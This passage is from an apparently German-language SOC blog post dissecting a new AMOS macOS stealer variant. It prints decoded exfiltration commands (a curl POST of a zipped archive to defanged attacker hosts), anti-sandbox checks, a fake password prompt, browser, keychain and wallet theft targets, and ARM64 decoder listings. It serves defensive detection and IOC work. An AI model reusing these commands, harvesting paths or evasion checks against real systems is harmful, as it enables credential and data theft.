Stunden",[1231],{"type":803,"value":1497,"toc":3607},[1498,1501,1504,1507,1510,1515,1517,1520,1528,1530,1534,1537,1540,1552,1555,1558,1566,1569,1573,1575,1578,1600,1603,1611,1614,1622,1629,1633,1635,1638,1646,1661,1665,1667,1670,1675,1678,1686,1690,1692,1700,1704,1706,1709,1713,1715,1718,1726,1730,1732,1740,1743,1841,1844,1874,1876,1880,1882,1889,1892,1896,1898,1982,1986,1988,1999,2006,2080,2091,2098,2102,2104,2169,2173,2175,2182,2184,2188,2190,2197,2223,2410,2413,2421,2432,2435,2443,2458,2471,2473,2477,2479,2497,2519,2709,2712,2720,2723,2726,2728,2732,2734,2737,2817,2820,2839,2918,2921,2923,2927,2929,2932,2939,2994,2997,3005,3008,3010,3014,3016,3023,3035,3083,3094,3133,3142,3157,3160,3162,3166,3168,3175,3178,3186,3189,3197,3211,3214,3216,3220,3222,3232,3236,3238,3256,3264,3278,3298,3302,3304,3307,3315,3318,3326,3340,3344,3346,3349,3357,3376,3382,3386,3388,3396,3402,3409,3413,3415,3423,3427,3429,3432,3440,3443,3447,3449,3457,3461,3463,3471,3475,3477,3485,3489,3491,3499,3516,3521,3523,3527,3529,3536,3553,3556,3569,3571,3575,3577,3580,3583,3586,3603],[806,1499,1500],{},"Wenn in unserem SOC ein Alert ausgelöst wird, beginnt die Uhr zu laufen: nicht nur für den betroffenen Kunden, 
sondern für alle Organisationen unter unserem Schutz. Der gefährlichste Moment im modernen Bedrohungsumfeld ist die Intelligence Gap, das Zeitfenster zwischen dem ersten Einsatz einer neuen Malware-Variante und dem Tag, an dem die Branche davon erfährt.",[806,1502,1503],{},"Für eigenständige Security-Teams bedeutet diese Lücke extreme Verwundbarkeit: Man wartet auf ein Vendor-Update oder einen Signatur-Feed, der noch nicht geschrieben wurde. Für unsere Kunden schließt unsere intern entwickelte Shared Threat Intelligence genau dieses Fenster.",[806,1505,1506],{},"Dieser Beitrag ist eine technische Aufschlüsselung, wie wir eine bisher undokumentierte AMOS-Variante (Atomic macOS Stealer) zerlegten und wie aus einem einzigen kompromittierten Endpoint innerhalb weniger Stunden eine flächendeckende Erkennung und Blockierung für alle unsere Kundenumgebungen wurde.",[1508,1509],"hr",{},[1511,1512,1514],"h1",{"id":1513},"der-vorfall-ein-unbekanntes-ioc-szenario","Der Vorfall: Ein unbekanntes IOC-Szenario",[806,1516,816],{},[806,1518,1519],{},"Der Alert traf am 12. März 2026 um 06:25 Uhr Ortszeit ein: Ein macOS-Endpoint war kompromittiert worden. Als unser SOC mit der Analyse der Artefakte begann, standen wir vor einer Situation, die jeder Threat Analyst fürchtet: keine bekannten Datei-Hashes, keine C2-IP-Adressen, keine aussagekräftigen Verhaltenssignaturen in öffentlichen Datenbanken.",[806,1521,1522,1523,1527],{},"Die vollständige Angriffsarchitektur offenbarte sich erst in der Tiefenanalyse. Die Infektion basierte auf einer 15,7 MB großen macOS Universal Binary (x86_64 und ARM64), abgelegt unter ",[1524,1525,1526],"code",{},"/private/tmp/helper",". 
Das Sample war auf dem kompromittierten System nicht direkt verfügbar; unser Team musste die Infektionskette rekonstruieren und die ursprüngliche Zustellanfrage simulieren, um die Binary manuell aus der Angreifer-Infrastruktur zu beziehen.",[1508,1529],{},[810,1531,1533],{"id":1532},"stage-1-sandbox-prüfungen","Stage 1: Sandbox-Prüfungen",[806,1535,1536],{},"{: .h4-font-size}",[806,1538,1539],{},"Bevor der eigentliche Stealer auf dem Gerät ausgeführt wurde, hatte bereits ein AppleScript-Payload gelaufen. Jeder String darin, jeder Dateipfad, jeder Shell-Befehl, jede URL war über drei benutzerdefinierte arithmetische Funktionen kodiert:",[1541,1542,1544],"div",{"style":1543},"background: var(--color-bg-grey); border-radius: 6px; padding: 1rem; margin: 0.25rem 0",[1545,1546,1550],"pre",{"className":1547,"code":1549,"language":916},[1548],"language-text","on ipbgcjzgqa(a, b)\n    -- result[i] = chr(a[i] - b[i])\n\non kwcvvjininv(a, b)\n    -- result[i] = chr(a[i] + b[i])\n\non xqylheckjx(a, b, offset)\n    -- result[i] = chr(a[i] - b[i] - offset)\n",[1524,1551,1549],{"__ignoreMap":863},[806,1553,1554],{},"Kein einziger String erscheint im Klartext. Was auf den ersten Blick wie bedeutungslose Integer-Arrays aussah, entpuppte sich nach Umkehrung des Kodierungsschemas als vollständiges, einsatzbereites Datendiebstahl- und Exfiltrationsframework.",[806,1556,1557],{},"Wir dekodierten jeden Array im Skript statisch. Die Ergebnisse waren eindeutig:",[1541,1559,1560],{"style":1543},[1545,1561,1564],{"className":1562,"code":1563,"language":916},[1548],"Download URL: https[:]//woupp[.]com/n8n/update\nExfil server: http[:]//92[.]246[.]136[.]14/contact\nExfil method: curl --connect-timeout 120 --max-time 300 -X POST -F \"file=@/tmp/out.zip\"\n",[1524,1565,1563],{"__ignoreMap":863},[806,1567,1568],{},"Die Download-URL imitiert bewusst ein legitimes n8n-Workflow-Automation-Update, ein Tool, das bei Entwicklern und DevOps-Ingenieuren weit verbreitet ist. 
Das ist kein Zufall: Die Kampagne zielt auf technisch versierte Nutzer, nicht auf gewöhnliche Endnutzer, die gecrackte Software installieren.",[810,1570,1572],{"id":1571},"der-anti-sandbox-check","Der Anti-Sandbox-Check",[806,1574,1536],{},[806,1576,1577],{},"Vor dem Download führte das Skript eine dedizierte VM- und Sandbox-Erkennungsroutine aus. Aus den Incident-Artefakten konnten wir zusätzlich ein eigenständiges Anti-Sandbox-Skript wiederherstellen:",[1541,1579,1580],{"style":1543},[1545,1581,1585],{"className":1582,"code":1583,"language":1584,"meta":863,"style":863},"language-applescript shiki shiki-themes github-light github-dark","set urgufr  to do shell script \"system_profiler SPMemoryDataType\"\nset qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n","applescript",[1524,1586,1587,1595],{"__ignoreMap":863},[1588,1589,1592],"span",{"class":1590,"line":1591},"line",1,[1588,1593,1594],{},"set urgufr  to do shell script \"system_profiler SPMemoryDataType\"\n",[1588,1596,1597],{"class":1590,"line":864},[1588,1598,1599],{},"set qcsvjxp to do shell script \"system_profiler SPHardwareDataType\"\n",[806,1601,1602],{},"Die Ergebnisse prüfte das Skript dann gegen zwei Listen. 
Die erste suchte nach Virtualisierungsmarkierungen in den Speicherdaten:",[1541,1604,1605],{"style":1543},[1545,1606,1609],{"className":1607,"code":1608,"language":916},[1548],"\"QEMU\"   \"VMware\"   \"KVM\"\n",[1524,1610,1608],{"__ignoreMap":863},[806,1612,1613],{},"Die zweite prüfte Hardware-Identifikatoren gegen eine Liste bekannter Seriennummern von Analysemaschinen:",[1541,1615,1616],{"style":1543},[1545,1617,1620],{"className":1618,"code":1619,"language":916},[1548],"\"Z31FHXYQ0J\"     -- known sandbox machine serial\n\"C07T508TG1J2\"   -- known sandbox machine serial\n\"C02TM2ZBHX87\"   -- known sandbox machine serial\n\"Chip: Unknown\"  -- emulation indicator\n\"Intel Core 2\"   -- legacy/VM indicator\n",[1524,1621,1619],{"__ignoreMap":863},[806,1623,1624,1625,1628],{},"Bei einer Übereinstimmung: ",[1524,1626,1627],{},"exit 100",", vollständiger Abbruch. Auf einem echten MacBook Pro mit Apple Silicon bestanden alle Prüfungen lautlos, und die Ausführung fuhr fort. Eine Sandbox-Evasionstechnik auf professionellem Niveau, die ablief, bevor ein einziges Byte der Binary heruntergeladen war.",[810,1630,1632],{"id":1631},"einfach-aber-wirkungsvoll-die-gefälschte-passwortabfrage","Einfach, aber wirkungsvoll: Die gefälschte Passwortabfrage",[806,1634,1536],{},[806,1636,1637],{},"Das dekodierte Skript enthielt auch den Dialog für die Privilegienerweiterung via Social Engineering:",[1541,1639,1640],{"style":1543},[1545,1641,1644],{"className":1642,"code":1643,"language":916},[1548],"Title:   \"Application wants to install helper\"\nPrompt:  \"Required Application Helper. Please enter device\n          password to continue.\"\nButton:  \"Continue\"\n",[1524,1645,1643],{"__ignoreMap":863},[806,1647,1648,1649,1652,1653,1656,1657,1660],{},"Der Dialog erscheint über einen Standard-macOS-",[1524,1650,1651],{},"display dialog","-Aufruf mit ",[1524,1654,1655],{},"with hidden answer"," und ist optisch nicht von einer echten macOS-Autorisierungsabfrage zu unterscheiden. 
Das eingegebene Passwort nutzte das Skript, um ",[1524,1658,1659],{},"login -pf \u003Cusername>"," aufzurufen und den Prozess auf Root-Rechte zu heben, noch bevor die Binary ausgeführt wurde.",[810,1662,1664],{"id":1663},"was-das-skript-gesammelt-hat","Was das Skript gesammelt hat",[806,1666,1536],{},[806,1668,1669],{},"Sobald die Binary ausgeführt war, setzte das osascript seinen eigenen Sammlungsablauf fort und griff jede Kategorie sensibler Systemdaten ab. Wir dekodierten alle Sammlungspfade und Ziele:",[1671,1672,1674],"h3",{"id":1673},"browser-daten-alle-chromium-browser-safari","Browser-Daten (alle Chromium-Browser + Safari):",[806,1676,1677],{},"{: .font-size-4}",[1541,1679,1680],{"style":1543},[1545,1681,1684],{"className":1682,"code":1683,"language":916},[1548],"/Login Data          /Cookies            /Web Data\n/Local Extension Settings/   /IndexedDB/   /Local Storage/leveldb/\n",[1524,1685,1683],{"__ignoreMap":863},[1671,1687,1689],{"id":1688},"macos-keychain","macOS Keychain:",[806,1691,1677],{},[1541,1693,1694],{"style":1543},[1545,1695,1698],{"className":1696,"code":1697,"language":916},[1548],"~/Library/Keychains/login.keychain-db  -- accessed directly via cat\n",[1524,1699,1697],{"__ignoreMap":863},[1671,1701,1703],{"id":1702},"apple-notes","Apple Notes",[806,1705,1677],{},[806,1707,1708],{},"Vollständiger Inhalt als HTML mit Zähler-Header exportiert",[1671,1710,1712],{"id":1711},"lokale-dateien","Lokale Dateien",[806,1714,1677],{},[806,1716,1717],{},"Desktop und Dokumente, bis zu 30 MB, mit Fokus auf:",[1541,1719,1720],{"style":1543},[1545,1721,1724],{"className":1722,"code":1723,"language":916},[1548],"pdf  doc  docx  xls  xlsx  ppt  pptx  txt  rtf\nkey  p12  pem  cert  pfx  sql  db  sqlite\njson  xml  yaml  conf  env  csv\n",[1524,1725,1723],{"__ignoreMap":863},[1671,1727,1729],{"id":1728},"kryptowährungs-wallets","Kryptowährungs-Wallets",[806,1731,1677],{},[806,1733,1734,1735,1739],{},"Eine hartcodierte Liste von 
",[1736,1737,1738],"strong",{},"mehr als 200 Browser-Extension-IDs",", die alle gängigen Wallets abdeckt, darunter MetaMask, Coinbase Wallet, TronLink, Phantom, Keplr, Yoroi, Ledger Live, Trezor Suite, XDEFI und Exodus.",[806,1741,1742],{},"Nach der Sammlung wurden alle Daten in einem zufällig benannten temporären Verzeichnis gebündelt und exfiltriert:",[1541,1744,1745],{"style":1543},[1545,1746,1750],{"className":1747,"code":1748,"language":1749,"meta":863,"style":863},"language-bash shiki shiki-themes github-light github-dark","ditto -c -k --sequesterRsrc \u003Cstaging_dir> /tmp/out.zip\ncurl --connect-timeout 120 --max-time 300 -X POST \\\n  -H \"user: \u003Cuuid>\" -H \"BuildID: \u003Chw_profile>\" \\\n  -F \"file=@/tmp/out.zip\" laislivon[.]com/contact\n","bash",[1524,1751,1752,1786,1812,1829],{"__ignoreMap":863},[1588,1753,1754,1758,1762,1765,1768,1772,1776,1780,1783],{"class":1590,"line":1591},[1588,1755,1757],{"class":1756},"sScJk","ditto",[1588,1759,1761],{"class":1760},"sj4cs"," -c",[1588,1763,1764],{"class":1760}," -k",[1588,1766,1767],{"class":1760}," --sequesterRsrc",[1588,1769,1771],{"class":1770},"szBVR"," \u003C",[1588,1773,1775],{"class":1774},"sZZnC","staging_di",[1588,1777,1779],{"class":1778},"sVt8B","r",[1588,1781,1782],{"class":1770},">",[1588,1784,1785],{"class":1774}," /tmp/out.zip\n",[1588,1787,1788,1791,1794,1797,1800,1803,1806,1809],{"class":1590,"line":864},[1588,1789,1790],{"class":1756},"curl",[1588,1792,1793],{"class":1760}," --connect-timeout",[1588,1795,1796],{"class":1760}," 120",[1588,1798,1799],{"class":1760}," --max-time",[1588,1801,1802],{"class":1760}," 300",[1588,1804,1805],{"class":1760}," -X",[1588,1807,1808],{"class":1774}," POST",[1588,1810,1811],{"class":1760}," \\\n",[1588,1813,1815,1818,1821,1824,1827],{"class":1590,"line":1814},3,[1588,1816,1817],{"class":1760},"  -H",[1588,1819,1820],{"class":1774}," \"user: \u003Cuuid>\"",[1588,1822,1823],{"class":1760}," -H",[1588,1825,1826],{"class":1774}," \"BuildID: 
\u003Chw_profile>\"",[1588,1828,1811],{"class":1760},[1588,1830,1832,1835,1838],{"class":1590,"line":1831},4,[1588,1833,1834],{"class":1760},"  -F",[1588,1836,1837],{"class":1774}," \"file=@/tmp/out.zip\"",[1588,1839,1840],{"class":1774}," laislivon[.]com/contact\n",[806,1842,1843],{},"Auffällig ist der Zielhost: Der Upload geht hier an laislivon[.]com/contact, während die zuvor statisch dekodierte Exfil-URL 92[.]246[.]136[.]14/contact lautete. Beide Endpunkte gehören gemeinsam in die IOC-Blockliste; da sie denselben Pfad /contact und denselben multipart-Upload (curl -F file=@/tmp/out.zip) verwenden, eignet sich dieses Muster zusätzlich als hostunabhängige Erkennungsregel auf Netzwerk- und Prozess-Kommandozeilen-Ebene. Die Bereinigung folgte unmittelbar:",[1541,1845,1846],{"style":1543},[1545,1847,1849],{"className":1747,"code":1848,"language":1749,"meta":863,"style":863},"rm -r \u003Cstaging_dir>\nrm /tmp/out.zip\n",[1524,1850,1851,1868],{"__ignoreMap":863},[1588,1852,1853,1856,1859,1861,1863,1865],{"class":1590,"line":1591},[1588,1854,1855],{"class":1756},"rm",[1588,1857,1858],{"class":1760}," -r",[1588,1860,1771],{"class":1770},[1588,1862,1775],{"class":1774},[1588,1864,1779],{"class":1778},[1588,1866,1867],{"class":1770},">\n",[1588,1869,1870,1872],{"class":1590,"line":864},[1588,1871,1855],{"class":1756},[1588,1873,1785],{"class":1774},[1508,1875],{},[1511,1877,1879],{"id":1878},"stage-2-reverse-engineering-der-helper-binary","Stage 2: Reverse Engineering der 'helper' Binary",[806,1881,816],{},[806,1883,1884,1885,1888],{},"Die ",[1524,1886,1887],{},"helper","-Binary ist der Teil, in dem diese Analyse wirklich in die Tiefe geht. 
Es handelt sich um ein professionell obfuskiertes macOS-Executable, das statische Analyse systematisch erschwert und den größten Reverse-Engineering-Aufwand dieser Untersuchung verursachte.",[806,1890,1891],{},"Die gesamte Analyse wurde mit Ghidra und unserem benutzerdefinierten ARM64-Analyse-Workflow durchgeführt.",[810,1893,1895],{"id":1894},"dateieigenschaften","Dateieigenschaften",[806,1897,1536],{},[1541,1899,1901],{"style":1900},"border-radius: 6px; overflow: hidden; margin: 0.25rem 0",[1902,1903,1905,1906,1905,1922],"table",{"style":1904},"width:100%; border-collapse: collapse; font-size: 0.85rem","\n  ",[1907,1908,1909,1910,1905],"thead",{},"\n    ",[1911,1912,1913,1914,1913,1919,1909],"tr",{},"\n      ",[1915,1916,1918],"th",{"style":1917},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Eigenschaft",[1915,1920,1921],{"style":1917},"Wert",[1923,1924,1909,1925,1909,1935,1909,1944,1909,1952,1909,1962,1909,1972,1905],"tbody",{},[1911,1926,1913,1927,1913,1932,1909],{},[1928,1929,1931],"td",{"style":1930},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Format",[1928,1933,1934],{"style":1930},"Mach-O Universal Binary",[1911,1936,1913,1937,1913,1941,1909],{},[1928,1938,1940],{"style":1939},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","Architectures",[1928,1942,1943],{"style":1939},"x86_64 (offset 0x1000) + ARM64 (offset 0x7ec000)",[1911,1945,1913,1946,1913,1949,1909],{},[1928,1947,1948],{"style":1930},"Size",[1928,1950,1951],{"style":1930},"15.7 
MB",[1911,1953,1913,1954,1913,1957,1909],{},[1928,1955,1956],{"style":1939},"MD5",[1928,1958,1959],{"style":1939},[1524,1960,1961],{},"4599fdf2fa2099b30d8bbf76703dd634",[1911,1963,1913,1964,1913,1967,1909],{},[1928,1965,1966],{"style":1930},"SHA-1",[1928,1968,1969],{"style":1930},[1524,1970,1971],{},"3992edfb6f885ae5f09f3e69a2578048d6d5bb54",[1911,1973,1913,1974,1913,1977,1909],{},[1928,1975,1976],{"style":1939},"SHA-256",[1928,1978,1979],{"style":1939},[1524,1980,1981],{},"5664800f21d63e448b934bfcdc258b0c7dadb36e88cf4dd71b24e19656a2b78d",[810,1983,1985],{"id":1984},"es-beginnt-vor-main","Es beginnt vor main()",[806,1987,1536],{},[806,1989,1990,1991,1994,1995,1998],{},"Das erste, was wir in Ghidra feststellten: Diese Binary verhält sich nicht wie ein normales Executable. Der eigentliche Einstiegspunkt ist nicht ",[1524,1992,1993],{},"main()",", sondern eine Funktion, die in ",[1524,1996,1997],{},"__mod_init_func"," registriert ist, einem macOS-Mechanismus, der den Dynamic Linker (dyld) anweist, bestimmte Funktionen beim Laden der Binary automatisch auszuführen, noch bevor main() aufgerufen wird. Für sich genommen ist das kein Malware-Indikator: Über denselben Mechanismus laufen auch die statischen Initialisierer gewöhnlicher C++-Programme. Verdächtig wird er erst durch den Anti-Analyse-Code, der hier darin untergebracht ist.",[806,2000,2001,2002,2005],{},"Die Init-Funktion bei ",[1524,2003,2004],{},"0x10009f384"," ist der eigentliche Einstiegspunkt der Malware. 
Hier die Ghidra-Dekompilierung:",[1541,2007,2008],{"style":1543},[2009,2010,2011,2015,2018,2021,2025,2026,2030,2031,2033,2034,2037,2038,2052],"code-block",{},[1588,2012,2014],{"style":2013},"color:#6a737d","// FUN_10009f384 @ 0x10009f384",[2016,2017],"br",{},[1588,2019,2020],{"style":2013},"// __mod_init_func registered — executes before main()",[1588,2022,2024],{"style":2023},"color:#d73a49","void"," ",[1588,2027,2029],{"style":2028},"color:#6f42c1","FUN_10009f384","(",[1588,2032,2024],{"style":2023},")\n{\n  ",[1588,2035,2036],{"style":2023},"int"," iVar1;\n",[806,2039,2040,2043,2044,2030,2047,2051],{},[1588,2041,2042],{"style":2013},"// Anti-sandbox delay: usleep(0x37e) = 894 microseconds","\niVar1 = ",[1588,2045,2046],{"style":2028},"_usleep",[1588,2048,2050],{"style":2049},"color:#005cc5","0x37e",");",[806,2053,2054,2057,2060,2061,2063,2064,2067,2068,2071,2072,2075,2076,2079],{},[1588,2055,2056],{"style":2013},"// Indirect jump table — 14-state machine",[1588,2058,2059],{"style":2013},"// Defeats CFG reconstruction in static analysis tools","\n(_(",[1588,2062,1524],{"style":2023}," _)((",[1588,2065,2066],{"style":2023},"ulong",")switchD_10009f43c::switchdataD_1000cd3fc * ",[1588,2069,2070],{"style":2049},"4"," + ",[1588,2073,2074],{"style":2049},"0x10009f440","))(iVar1);\n",[1588,2077,2078],{"style":2023},"return",";\n}",[806,2081,2082,2083,2086,2087,2090],{},"Zwei Dinge stechen sofort heraus. Erstens das 894-Mikrosekunden-",[1524,2084,2085],{},"usleep"," beim Start. Als Verzögerung ist es viel zu kurz, um Sandbox-Timeouts auszusitzen, und aus dem gezeigten Code allein ist kein Anti-Sandbox-Effekt belegt: Der Rückgabewert wird lediglich als Argument an den Dispatcher durchgereicht. Wir werten es deshalb nur als Timing-Indiz, nicht als belastbares Evasions-Signal. Schwerwiegender ist die indirekte Sprungtabelle bei ",[1524,2088,2089],{},"0x10009f43c",". Das ist ein berechneter Branch, bei dem die Zieladresse zur Laufzeit aus einer Lookup-Tabelle ermittelt wird. Statische Analysetools können den Control-Flow-Graphen nicht rekonstruieren; Ghidra protokollierte mehrere \"unreachable block\"-Warnungen beim Versuch, den Ausführungspfad zu verfolgen. 
Das ist so beabsichtigt.",[806,2092,2093,2094,2097],{},"Die Sprungtabelle treibt eine ",[1736,2095,2096],{},"14-Zustands-Ausführungsmaschine"," an. Jeder Zustand führt einen einzelnen diskreten Schritt der Entschlüsselungs- und Ausführungspipeline durch. Der Zustandszähler wird nach jedem Schritt aktualisiert, und die Maschine läuft, bis alle Zustände durchlaufen sind.",[810,2099,2101],{"id":2100},"der-arm64-disassembly-des-state-dispatchers","Der ARM64 Disassembly des State Dispatchers",[806,2103,1536],{},[1541,2105,2106],{"style":1543},[1545,2107,2111],{"className":2108,"code":2109,"language":2110,"meta":863,"style":863},"language-asm shiki shiki-themes github-light github-dark","10009f3fc:  stp xzr,xzr,[sp, #0x48]\n10009f41c:  mov w0,#0x37e\n10009f420:  bl  0x1000a0fa8          ; _usleep(0x37e) — 894µs anti-sandbox\n10009f424:  cmp w25,#0xd             ; state counter \u003C 14?\n10009f428:  b.hi 0x10009fd44         ; exit if done\n10009f42c:  mov w8,w25               ; current state index\n10009f430:  adr x9,0x10009f440       ; base of jump table\n10009f434:  ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n10009f438:  add x9,x9,x10, LSL #0x2  ; compute target address\n10009f43c:  br x9                    ; indirect branch, CFG broken here\n","asm",[1524,2112,2113,2118,2123,2128,2133,2139,2145,2151,2157,2163],{"__ignoreMap":863},[1588,2114,2115],{"class":1590,"line":1591},[1588,2116,2117],{},"10009f3fc:  stp xzr,xzr,[sp, #0x48]\n",[1588,2119,2120],{"class":1590,"line":864},[1588,2121,2122],{},"10009f41c:  mov w0,#0x37e\n",[1588,2124,2125],{"class":1590,"line":1814},[1588,2126,2127],{},"10009f420:  bl  0x1000a0fa8          ; _usleep(0x37e) — 894µs anti-sandbox\n",[1588,2129,2130],{"class":1590,"line":1831},[1588,2131,2132],{},"10009f424:  cmp w25,#0xd             ; state counter \u003C 14?\n",[1588,2134,2136],{"class":1590,"line":2135},5,[1588,2137,2138],{},"10009f428:  b.hi 0x10009fd44         ; exit if 
done\n",[1588,2140,2142],{"class":1590,"line":2141},6,[1588,2143,2144],{},"10009f42c:  mov w8,w25               ; current state index\n",[1588,2146,2148],{"class":1590,"line":2147},7,[1588,2149,2150],{},"10009f430:  adr x9,0x10009f440       ; base of jump table\n",[1588,2152,2154],{"class":1590,"line":2153},8,[1588,2155,2156],{},"10009f434:  ldrh w10,[x20, x8, LSL#1]; load jump offset from table\n",[1588,2158,2160],{"class":1590,"line":2159},9,[1588,2161,2162],{},"10009f438:  add x9,x9,x10, LSL #0x2  ; compute target address\n",[1588,2164,2166],{"class":1590,"line":2165},10,[1588,2167,2168],{},"10009f43c:  br x9                    ; indirect branch, CFG broken here\n",[810,2170,2172],{"id":2171},"sechs-gestapelte-obfuskierungsschichten","Sechs gestapelte Obfuskierungsschichten",[806,2174,1536],{},[806,2176,2177,2178,2181],{},"Die Binary verwendet sechs verschiedene Obfuskierungsschichten, gestapelt und verkettet, sodass die Ausgabe jeder Schicht in die nächste eingespeist wird. Jeder Payload, jeder String, jede interne Konstante ist kodiert. Im ",[1524,2179,2180],{},"__const","-Segment erscheint nichts Bedeutungsvolles im Klartext. Was folgt, ist eine vollständige schichtweise Aufschlüsselung, direkt in Ghidra verifiziert, bis hinunter zu einzelnen ARM64-Instruktionen. Jede der verwendeten Techniken ist für sich allein bekannt; ihre verkettete Anwendung über mehrere Stufen schuf jedoch einen stark voneinander abhängigen Ausführungsfluss, der die statische und dynamische Analyse erheblich erschwerte.",[1508,2183],{},[1671,2185,2187],{"id":2186},"layer-1-compile-time-triplet-kodierung","Layer 1: Compile-Time-Triplet-Kodierung",[806,2189,1677],{},[806,2191,2192,2193,2196],{},"Kein String in der Binary ist als Zeichenfolge gespeichert, sondern als Sequenz von 12-Byte-Arithmetik-Triplets. Jedes Triplet ",[1524,2194,2195],{},"(a, b, shift)"," kodiert genau ein Ausgabezeichen. 
Das Kodierungsschema wird zur Kompilierzeit angewendet, sodass kein String jemals als Klartext in der Binary existiert, nicht einmal vorübergehend beim Laden.",[806,2198,2199,2200,2203,2204,2207,2208,2211,2212,2203,2215,2218,2219,2222],{},"Zwei separate Decoder-Funktionen behandeln unterschiedliche String-Größen. ",[1524,2201,2202],{},"FUN_100087c08"," bei ",[1524,2205,2206],{},"0x100087c08"," dekodiert 60-Zeichen-Strings (720 Byte Eingabedaten aus ",[1524,2209,2210],{},"DAT_1006292cc","). ",[1524,2213,2214],{},"FUN_10007ad80",[1524,2216,2217],{},"0x10007ad80"," dekodiert 56-Zeichen-Strings (672 Byte aus ",[1524,2220,2221],{},"DAT_10049708c","). Beide verwenden denselben Algorithmus.",[1541,2224,2225],{"style":1543},[2009,2226,2227,2230,2232,2235,2025,2237,2030,2239,2242,2243,2245,2246,2248,2249,2251,2252,2255,2256],{},[1588,2228,2229],{"style":2013},"// FUN_100087c08 @ 0x100087c08",[2016,2231],{},[1588,2233,2234],{"style":2013},"// Triplet decoder, 60 chars, data from DAT_1006292cc",[1588,2236,2024],{"style":2023},[1588,2238,2202],{"style":2028},[1588,2240,2241],{"style":2023},"long"," *param_1)\n{\n  ",[1588,2244,2241],{"style":2023}," *plVar1;\n  ",[1588,2247,2024],{"style":2023}," *pvVar2;\n  ",[1588,2250,2241],{"style":2023}," lVar3;\n  ",[1588,2253,2254],{"style":2023},"uint"," *puVar4;\n",[806,2257,2258,2259,2030,2262,2265,2266,2271,2274,2275,2265,2277,2280,2282,2285,2286,2289,2290,2265,2293,2296,2297,2299,2300,2063,2302,2304,2305,2308,2309,2312,2313,2315,2316,2319,2320,2323,2324,2063,2327,2329,2330,2333,2334,2337,2339,2342,2343,2063,2345,2347,2348,2350,2351,2353,2354,2359,2360,2363,2364,2369,2370,2373,2374,2376,2377,2382,2383,2385,2386,2388,2389,2392,2393,2396,2397,2265,2399,2402,2404,2407,2408,2079],{},"pvVar2 = ",[1588,2260,2261],{"style":2028},"operator_new",[1588,2263,2264],{"style":2049},"0x2d0","); ",[1588,2267,2268,2269],{"style":2013},"// allocate 720 bytes (60 triplets × 12)",[2016,2270],{},[1588,2272,2273],{"style":2028},"_memcpy","(pvVar2, 
&DAT_1006292cc, ",[1588,2276,2264],{"style":2049},[1588,2278,2279],{"style":2013},"// copy encoded triplets from __const",[2016,2281],{},[1588,2283,2284],{"style":2028},"FUN_1000a0840","(param_1, ",[1588,2287,2288],{"style":2049},"0x3c",", ",[1588,2291,2292],{"style":2049},"0",[1588,2294,2295],{"style":2013},"// init 60-char output buffer","\nlVar3 = ",[1588,2298,2292],{"style":2049},";\npuVar4 = (",[1588,2301,2254],{"style":2023},[1588,2303,2241],{"style":2023},")pvVar2 + ",[1588,2306,2307],{"style":2049},"8",");\n",[1588,2310,2311],{"style":2023},"do"," {\nplVar1 = (",[1588,2314,2241],{"style":2023}," _)_param_1;\n",[1588,2317,2318],{"style":2023},"if"," (-",[1588,2321,2322],{"style":2049},"1"," \u003C _(",[1588,2325,2326],{"style":2023},"char",[1588,2328,2241],{"style":2023},")param_1 + ",[1588,2331,2332],{"style":2049},"0x17",")) {\nplVar1 = param_1;\n}\n",[1588,2335,2336],{"style":2013},"// THE DECODE FORMULA, one character per triplet:",[2016,2338],{},[1588,2340,2341],{"style":2013},"// char = ((b _ 3) XOR a) >> shift) - b","\n_(",[1588,2344,2326],{"style":2023},[1588,2346,2241],{"style":2023},")plVar1 + lVar3) =\n(",[1588,2349,2326],{"style":2023},")((",[1588,2352,2036],{"style":2023},")(puVar4",[1588,2355,2356,2357],{},"-",[1588,2358,2322],{"style":2049}," * ",[1588,2361,2362],{"style":2049},"3"," ^ puVar4",[1588,2365,2356,2366],{},[1588,2367,2368],{"style":2049},"2",") >> (*puVar4 & ",[1588,2371,2372],{"style":2049},"0x1f",")) - (",[1588,2375,2326],{"style":2023},")puVar4",[1588,2378,2379],{},[1588,2380,2381],{"style":2049},"-1",";\nlVar3 = lVar3 + ",[1588,2384,2322],{"style":2049},";\npuVar4 = puVar4 + ",[1588,2387,2362],{"style":2049},"; ",[1588,2390,2391],{"style":2013},"// advance 12 bytes — next triplet","\n} ",[1588,2394,2395],{"style":2023},"while"," (lVar3 != ",[1588,2398,2288],{"style":2049},[1588,2400,2401],{"style":2013},"// loop exactly 60 
times",[2016,2403],{},[1588,2405,2406],{"style":2028},"operator_delete","(pvVar2);\n",[1588,2409,2078],{"style":2023},[806,2411,2412],{},"Der entsprechende ARM64-Assembly, wobei jede Instruktion direkt einer Operation in der Formel entspricht:",[1541,2414,2415],{"style":1543},[1545,2416,2419],{"className":2417,"code":2418,"language":916},[1548],"100087c48:  add x9,x20,#0x8\n100087c4c:  ldp w10,w11,[x9, #-0x8]   ; load a → w10,  b → w11\n100087c50:  add w12,w11,w11, LSL #0x1 ; w12 = b + (b \u003C\u003C 1) = b * 3\n                                       ; (compiler avoids MUL instruction)\n100087c54:  eor w10,w12,w10           ; w10 = (b*3) XOR a\n100087c58:  ldr w12,[x9], #0xc        ; w12 = shift value; post-increment by 12\n100087c5c:  asr w10,w10,w12           ; arithmetic right shift — sign bit preserved\n100087c60:  sub w10,w10,w11           ; subtract b — final decoded character\n100087c74:  strb w10,[x11, x8, LSL ]  ; store one byte to output buffer\n100087c78:  add x8,x8,#0x1\n100087c7c:  cmp x8,#0x3c              ; loop counter vs. 60\n100087c80:  b.ne 0x100087c4c          ; continue until all 60 chars decoded\n",[1524,2420,2418],{"__ignoreMap":863},[806,2422,2423,2424,2427,2428,2431],{},"Bemerkenswert: Die Multiplikation ",[1524,2425,2426],{},"b × 3"," ist als ",[1524,2429,2430],{},"add w12, w11, w11, LSL #1"," implementiert, ein Shift-and-Add, der eine Multiplikationsinstruktion vollständig vermeidet. Das ist eine klassische Compiler-Optimierung, die den Code zugleich schwerer per Signatur-Matching auffindbar macht.",[806,2433,2434],{},"Die vollständige Dekodierungsformel:",[1541,2436,2437],{"style":1543},[1545,2438,2441],{"className":2439,"code":2440,"language":916},[1548],"char = ASR( (b × 3) XOR a, shift ) − b\n",[1524,2442,2440],{"__ignoreMap":863},[806,2444,2445,2446,2449,2450,2453,2454,2457],{},"Der 